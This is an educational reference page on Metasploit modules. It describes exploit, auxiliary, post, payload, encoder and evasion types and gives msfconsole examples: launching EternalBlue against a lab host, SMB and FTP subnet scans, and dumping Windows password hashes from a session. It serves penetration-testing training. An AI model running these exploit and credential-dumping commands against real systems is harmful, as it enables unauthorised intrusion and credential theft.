📦 Modules¶
Everything in Metasploit revolves around modules. A module is a self-contained piece of code designed to perform a specific task — whether that's exploiting a vulnerability, scanning a network, or escalating privileges on a compromised host. Understanding the different module types and how they interact is fundamental to using Metasploit effectively.
1️⃣ Module Types Overview¶
| Type | Path Prefix | Purpose |
|---|---|---|
| Exploit | exploit/ |
Delivers a payload by exploiting a vulnerability in a target. |
| Auxiliary | auxiliary/ |
Performs actions that don't involve exploitation — scanning, fuzzing, sniffing, brute-forcing. |
| Post | post/ |
Runs on an already-compromised system — enumeration, privilege escalation, data exfiltration. |
| Payload | payload/ |
The code that runs on the target after a successful exploit (e.g., reverse shell, Meterpreter). |
| Encoder | encoder/ |
Transforms payloads to avoid bad characters or evade basic signature detection. |
| Nop | nop/ |
Generates NOP (No Operation) sleds for buffer overflow exploits. |
| Evasion | evasion/ |
Generates payloads specifically designed to bypass antivirus and EDR solutions. |
2️⃣ Exploit Modules¶
Exploit modules are the core of Metasploit. They leverage a vulnerability in a target service to deliver a payload.
Structure¶
Exploits are organized by platform and service:
exploit/
├── windows/
│ ├── smb/
│ │ ├── ms17_010_eternalblue
│ │ └── ms08_067_netapi
│ ├── http/
│ └── local/
├── linux/
│ ├── http/
│ └── local/
├── multi/
│ ├── http/
│ └── handler/ ← The generic payload handler
└── unix/
Example: Using an Exploit Module¶
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s)
RPORT 445 yes The target port (TCP)
SMBDomain no The Windows domain
SMBPass no The password for the username
SMBUser no The username to authenticate as
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.2
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Concept
The exploit/multi/handler module is special — it's a generic listener that catches incoming connections from payloads you've delivered through other means (e.g., a manually placed executable, a phishing email, or MSFVenom-generated payload).
3️⃣ Auxiliary Modules¶
Auxiliary modules perform tasks that don't involve exploitation. They are your go-to for reconnaissance and information gathering within Metasploit.
Common Categories¶
| Category | Path | Purpose |
|---|---|---|
| Scanner | auxiliary/scanner/ |
Port scanning, service detection, vulnerability checks. |
| Fuzz | auxiliary/fuzz/ |
Protocol fuzzing to discover crashes and potential vulnerabilities. |
| Gather | auxiliary/gather/ |
Information gathering (SNMP, DNS, HTTP). |
| Admin | auxiliary/admin/ |
Administrative actions (e.g., enabling xp_cmdshell on MSSQL). |
| Server | auxiliary/server/ |
Set up rogue services (DNS, DHCP, SMB) for attacks like LLMNR poisoning. |
Example: SMB Version Scanner¶
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.0/24
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 10
msf6 auxiliary(scanner/smb/smb_version) > run
Example: FTP Anonymous Login Check¶
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.0/24
msf6 auxiliary(scanner/ftp/anonymous) > run
4️⃣ Post-Exploitation Modules¶
Post modules run after you've already gained access to a target (i.e., you have an active session). They are used for:
- Enumeration — Gathering system info, installed software, network config.
- Privilege Escalation — Exploiting local vulnerabilities to gain SYSTEM/root.
- Credential Harvesting — Dumping hashes, tokens, cached credentials.
- Persistence — Installing backdoors for re-entry.
- Lateral Movement — Pivoting to other hosts on the network.
Example: Dump Windows Hashes¶
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(windows/gather/hashdump) > run
Example: Enumerate Linux System Info¶
msf6 > use post/linux/gather/enum_system
msf6 post(linux/gather/enum_system) > set SESSION 2
msf6 post(linux/gather/enum_system) > run
Tip
Post modules always require a SESSION option — the ID of an active Meterpreter or shell session. Use sessions -l to list your active sessions.
5️⃣ Listing and Exploring Modules¶
# Show all modules of a specific type
show exploits
show auxiliary
show post
show payloads
show encoders
show nops
show evasion
# Count all available modules
grep -c "" /usr/share/metasploit-framework/modules/exploits/**/*.rb
# Get detailed info about a loaded module
info
# Show advanced options (hidden by default)
show advanced
# Show evasion options (for compatible modules)
show evasion
6️⃣ Module Locations¶
Metasploit modules are stored in two locations:
| Location | Purpose |
|---|---|
/usr/share/metasploit-framework/modules/ |
Built-in modules shipped with Metasploit. |
~/.msf4/modules/ |
Custom modules you've written or imported. |
Note
Never modify files in /usr/share/metasploit-framework/ directly — updates will overwrite your changes. Always place custom or modified modules in ~/.msf4/modules/, mirroring the same directory structure.
7️⃣ Gotchas¶
Note
Module compatibility: Not every exploit works with every payload. Use show payloads after selecting an exploit to see only the compatible payloads. Attempting to use an incompatible payload will result in errors.
Note
Exploit reliability: Just because an exploit exists for a CVE doesn't mean it will work reliably. Check the module's Rank, read the info description, and test in a lab environment first.
Note
exploit/multi/handler is not an exploit in the traditional sense. It's a listener. You use it when your payload has already been delivered to the target through other means (MSFVenom, social engineering, file upload, etc.).
Warning
Always verify module descriptions and target information before running an exploit. Some exploits can crash services or cause data loss on the target system.